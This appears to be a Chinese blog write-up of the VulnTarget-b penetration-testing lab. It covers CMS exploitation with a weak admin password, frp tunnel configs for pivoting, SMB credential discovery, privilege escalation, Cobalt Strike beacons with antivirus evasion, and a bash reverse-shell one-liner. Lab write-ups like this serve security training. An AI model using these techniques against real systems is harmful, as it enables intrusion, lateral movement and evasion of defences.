Vulntarget-b

0 信息收集
1 打点
2 内网信息收集
3 内网穿透
4 内网主机-1
5 搭建二级隧道
6 拿下域控-方法1
7 拿下域控-方法2

0 信息收集

刚刚看到scaninfo这款工具，顺手试了下效果还可以。

{"ip":"192.168.1.114","port":21,"service":"ftp","Banner":"220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\\x0d\\x0a220-You are user number 1 of 50 allowed.\\x0d\\x0a220-Local time is now 14:48. Server port: 21.\\x0d\\x0a220-This is a private system - No anonymous login\\x0d\\x0a220-IPv6 connections are also welcome on this server.\\x0d\\x0a220 You will be disconnected after 15 minutes of inactivity.\\x0d\\x0a500 HTTP command: [get]\\x0d\\x0a","url":""}
{"ip":"192.168.1.114","port":22,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"192.168.1.114","port":110,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":25,"service":"","Banner":"","url":""}
{"ip":"192.168.1.114","port":80,"service":"http","Banner":"","url":"http://192.168.1.114:80"}
{"ip":"192.168.1.114","port":81,"service":"http","Banner":"","url":"http://192.168.1.114:81"}
{"ip":"192.168.1.114","port":8888,"service":"http","Banner":"","url":"http://192.168.1.114:8888"}
{"url":"http://192.168.1.114:80","StatusCode":200,"Title":"没有找到站点","HeaderDigest":"server:nginx","Length":1326,"KeywordFinger":"宝塔-BT.cn","HashFinger":""}
{"url":"http://192.168.1.114:81","StatusCode":200,"Title":"极致CMS建站系统","HeaderDigest":"server:nginx","Length":14398,"KeywordFinger":"","HashFinger":""}
{"url":"http://192.168.1.114:8888","StatusCode":200,"Title":"安全入口校验失败","HeaderDigest":"server:nginx","Length":802,"KeywordFinger":"宝塔-BT.cn","HashFinger":"宝塔-BT.cn"}

有两个开放的web服务，一个是8888端口的宝塔，一个是81端口的极致CMS建站系统

宝塔有点烦，看看极致CMS先

1 打点

扫了下目录，基本都是403，就readme.txt和admin.php有用

readme.txt中有版本号 极致CMS Beta1.8.1 ，admin.php是后台登录入口，搜一手漏洞，看到了先知上的这篇文章，弱口令试了好些，最后试出来admin/admin123，按照步骤操作即可

用蚁剑连接，执行命令时发现返回ret=127，需要绕过disable_functions，直接用插件绕过

2 内网信息收集

当前主机ip192.168.1.114，查看网段。。。发现没有响应

换个大马上去，发现大马执行命令提示不存在

换了个思路，用/proc/net/arp查看

小小火说可以用/sbin/*来执行，因为没有加到环境变量里（默认是/usr/bin）

发现存在内网网段，10.0.20.0/24，以及存活主机10.0.20.66（arp表）

使用scaninfo指定ip，不探测存活进行扫描./scaninfo -np -i 10.0.20.66

{"ip":"10.0.20.66","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"10.0.20.66","port":8080,"service":"http","Banner":"","url":"http://10.0.20.66:8080"}
{"url":"http://10.0.20.66:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""

3 内网穿透

使用frp进行内网穿透

在公网vps上运行frps，frps.ini

[common]
bind_addr = 0.0.0.0
bind_port = 7788

在目标机器上运行frpc，frpc.ini

[common]
server_addr = x.x.x.x # vps公网ip
server_port = 7788
[http_proxy]
type = tcp
remote_port = 7777
plugin = socks5

运行./frpc -c frpc.ini，服务端接收到连接

4 内网主机-1

10.0.20.66:8080，禅道管理系统

访问http://10.0.20.66:8080/index.php?mode=getconfig查询版本信息

点击使用demo账号登录，进入后台，使用CNVD-C-2020-121325漏洞getshell，但这个漏洞需要管理员账号

好兄弟告诉我账号密码是admin/Admin123。。。

使用python在10.0.20.30上起一个http服务，python -m SimpleHTTPServer 11881

按照漏洞利用步骤操作就可以了

是个低权限用户

有域vulntarget.com，在10.0.10.0/24网段

tasklist /svc发现火绒

5 搭建二级隧道

一级代理不要断

部署顺序（先服务端，再客户端）：可出网主机-服务端---> 内网主机-客户端 ---> vps-服务端 ---> 可出网主机-客户端

vps

[common]
bind_addr = 0.0.0.0
bind_port = 7799
allow_ports = 1000-2000

可出网主机-客户端

[common]
server_addr = 47.102.44.211
server_port = 7799
[http_proxy]
type = tcp
local_ip = 10.0.20.30
local_port = 1080
remote_port = 1080

可出网主机-服务端

[common]
bind_addr = 10.0.20.30
bind_port = 7799
allow_ports = 1000-2000

内网主机-客户端

[common]
server_addr = 10.0.20.30
server_port = 7799        
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5

本来是想挂代理上大马的，结果一直没上去，就用代理继续往下打了。

6 拿下域控-方法1

把scaninfo传上去，扫了一下，直接拿到了域控账号密码（scaninfo牛逼）

{"ip":"10.0.10.99","port":445,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.100","port":88,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.99","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.99","port":3306,"service":"mysql","Banner":"NOT ALLOWED","url":""}
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":445,"service":"microsoft-ds","Banner":"\\x00\\x00\\x00\\x83ÿSMBr\\x00\\x00\\x00\\x00\\x88\\x01@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x06\\x00\\x00\\x01\\x00\\x11\\x07\\x00\\x0f2\\x00\\x01\\x00\\x04A\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00üó\\x01\\x00M\\x7f\\x81à\\x9c;Ø\\x01 þ\\x08>\\x00\\x89ÓÀ\\x0bÁ]µwV\\x00U\\x00L\\x00N\\x00T\\x00A\\x00R\\x00G\\x00E\\x00T\\x00\\x00\\x00W\\x00I\\x00N\\x00-\\x00U\\x00H\\x002\\x000\\x00P\\x00R\\x00D\\x003\\x00E\\x00A\\x00O\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":25,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.100","port":53,"service":"dns","Banner":"-NOBANNER-","url":""}
{"ip":"10.0.10.99","port":25,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.99","port":8080,"service":"http","Banner":"","url":"http://10.0.10.99:8080"}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n   [->]WIN-UH20PRD3EAO\n   [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100    [+]DC VULNTARGET\\WIN-UH20PRD3EAO   Windows Server 2016 Datacenter 14393"}
{"url":"http://10.0.10.99:8080","StatusCode":200,"Title":"","HeaderDigest":"server:Microsoft-IIS/10.0","Length":141,"KeywordFinger":"禅道","HashFinger":""}
{"cve-2020-0796":"cve-2020-0796","host":"10.0.10.99","port":445,"result":"[+] 10.0.10.99 CVE-2020-0796 SmbGhost Vulnerable"}
{"smb":"smb","host":"10.0.10.99","password":"admin@123","username":"administrator"}
{"smb":"smb","host":"10.0.10.100","password":"Admin@123","username":"administrator"}

用搭好的代理rdp即可

7 拿下域控-方法2

因为蚁剑的shell是无状态的，比较麻烦，所以在可出网主机上反弹个shell出来bash -i >& /dev/tcp/ip/port 0>& 1

查看系统版本信息cat /proc/version,cat /etc/redhat-release

查了下有好几个可以提权的cve，但是运行时会报error（环境变量问题），所以要另寻出路，cs也用不了，只剩下msf了

搜了下msf有自动提权的插件suggester，试试看

（中间因为vps上的msf加载suggester的插件加载不出来，所以用的frp+本地的kali）

后来发现是最新版本的bug？又转回vps，使用pkexec提权成功

shell进入交互式shell，发现在root目录下有个flag

运行cs大马，上线成功，而且执行命令正常

生成一个pivot listener，相当于中继

因为4.2不能拿到pivot listener的payload，所以用web delivery，然后下载，拿出shellcode，然后免杀

上线上了老半天，上不去，我猜测是linux的session没法pivot

换个思路，让他出网上线，用goproxy，（第一次开启状态ok但没法用，第二次正常）

创建一个走代理的beacon

生成stageless的payload，免杀，上传，运行，上线！

搜了下补丁，可以用CVE-2021-1732提权，但是火绒直接给杀掉了，先不提权了，做下信息收集，10.0.10.0段除了本机，只有一台存活主机

用scaninfo扫一下，确认是域控

{"ip":"10.0.10.100","port":135,"service":"msrcp","Banner":"\\x05\\x00\\x0d\\x03\\x10\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x08\\x01@\\x04\\x00\\x01\\x05\\x00\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":139,"service":"netbios-ssn","Banner":"","url":""}
{"ip":"10.0.10.100","port":88,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":389,"service":"ldap","Banner":"","url":""}
{"ip":"10.0.10.100","port":3389,"service":"rdp","Banner":"Windows Vista or later","url":""}
{"ip":"10.0.10.100","port":110,"service":"","Banner":"","url":""}
{"ip":"10.0.10.100","port":445,"service":"microsoft-ds","Banner":"\\x00\\x00\\x00\\x83ÿSMBr\\x00\\x00\\x00\\x00\\x88\\x01@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x06\\x00\\x00\\x01\\x00\\x11\\x07\\x00\\x0f2\\x00\\x01\\x00\\x04A\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00üó\\x01\\x00\\x96ë«W`<Ø\\x01 þ\\x08>\\x00+\\x011Ø\\x14lÃ*V\\x00U\\x00L\\x00N\\x00T\\x00A\\x00R\\x00G\\x00E\\x00T\\x00\\x00\\x00W\\x00I\\x00N\\x00-\\x00U\\x00H\\x002\\x000\\x00P\\x00R\\x00D\\x003\\x00E\\x00A\\x00O\\x00\\x00\\x00","url":""}
{"ip":"10.0.10.100","port":53,"service":"dns","Banner":"-NOBANNER-","url":""}
{"ip":"10.0.10.100","port":25,"service":"","Banner":"","url":""}
{"findnet":"findnet","host":"10.0.10.100","result":"NetInfo:\n[*]10.0.10.100\n   [->]WIN-UH20PRD3EAO\n   [->]10.0.10.100"}
{"NetBIOS":"NetBIOS","host":"10.0.10.100","result":"[*] 10.0.10.100    [+]DC VULNTARGET\\WIN-UH20PRD3EAO   Windows Server 2016 Datacenter 14393"}

测试了一下，发现在cs里运行提权脚本是不会被杀的（迷惑），但提权脚本需要按下任意键继续，查了一下，可以通过echo来完成

但没法用在这里，然后修改了源码删掉了pause，找大哥帮忙编译好之后，运行被杀了。。。想起来之前没被杀是因为没有输入回车，没有执行下去。

然后把exp做了个免杀，还是不行。人已经麻了。这块提权要靠msf，直接把exp加载到内存执行，且逻辑完整，不需要输入。

鸽了。。。vulntarget-b得用msf才行，暂时还没用cs打的思路

posted @ 2022-04-02 21:42 R3col 阅读(438) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

r3col